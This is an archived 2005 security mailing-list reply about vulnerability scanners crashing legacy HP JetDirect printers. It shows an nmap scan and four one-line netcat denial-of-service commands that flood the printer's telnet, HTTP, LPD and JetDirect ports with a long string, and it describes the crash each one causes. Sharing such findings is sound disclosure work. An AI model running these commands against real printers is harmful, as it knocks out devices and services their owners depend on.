Re: Experiences with company nCircle and their IP360 product

From: Marco Ivaldi (raptor@0xdeadbeef.info)
Date: Fri Dec 02 2005 - 13:50:41 EST


> One other thing I've seen with nCircle (& a few other scanners), if you
> run internally & have any legacy HP jetdirect printers located on your
> network, you may want to check with nCircle to see if their scans still
> lock up those printers.

Actually, it's usually fairly easy to DoS printers, specially if they are
using an old firmware release. Here are a few ways to reproduce some HP
JetDirect vulnerabilities (tested on J3111A, firmware version G.05.35 --
it's quite old, i didn't bother to test newer releases):

root@charon:~# nmap -A x.x.x.x
Interesting ports on printer.mediaservice.pri (x.x.x.x):
(The 1655 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE VERSION
23/tcp open telnet HP JetDirect printer telnetd
80/tcp open http?
515/tcp open printer?
9100/tcp open jetdirect?
Device type: printer|print server
Running: HP embedded
OS details: HP printer w/JetDirect card

1) TELNET. Crash all network services:
    root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 23
2) HTTP. Crash all network services with funny stack dump on paper:
    root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 80
3) PRINTER. The printer switches indefinitely between data recv and ready:
    root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 515
4) JETDIRECT. Prints ABCD... and leaves the printer in "unstable" status:
    root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 9100

Pretty lame, isn't it? In case someone's interested i've scanned the funny
stack dump printed on paper and put it on-line here:

http://www.0xdeadbeef.info/stuff/hp-crash.jpg

Sincerely,

-- 
Marco Ivaldi
Antifork Research, Inc.   http://0xdeadbeef.info/
3B05 C9C5 A2DE C3D7 4233  0394 EF85 2008 DBFD B707
------------------------------------------------------------------------------
Audit your website security with Acunetix Web Vulnerability Scanner: 
Hackers are concentrating their efforts on attacking applications on your 
website. Up to 75% of cyber attacks are launched on shopping carts, forms, 
login pages, dynamic content etc. Firewalls, SSL and locked-down servers are 
futile against web application hacking. Check your website for vulnerabilities 
to SQL injection, Cross site scripting and other web attacks before hackers do! 
Download Trial at:
http://www.securityfocus.com/sponsor/pen-test_050831
-------------------------------------------------------------------------------


This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:55:13 EDT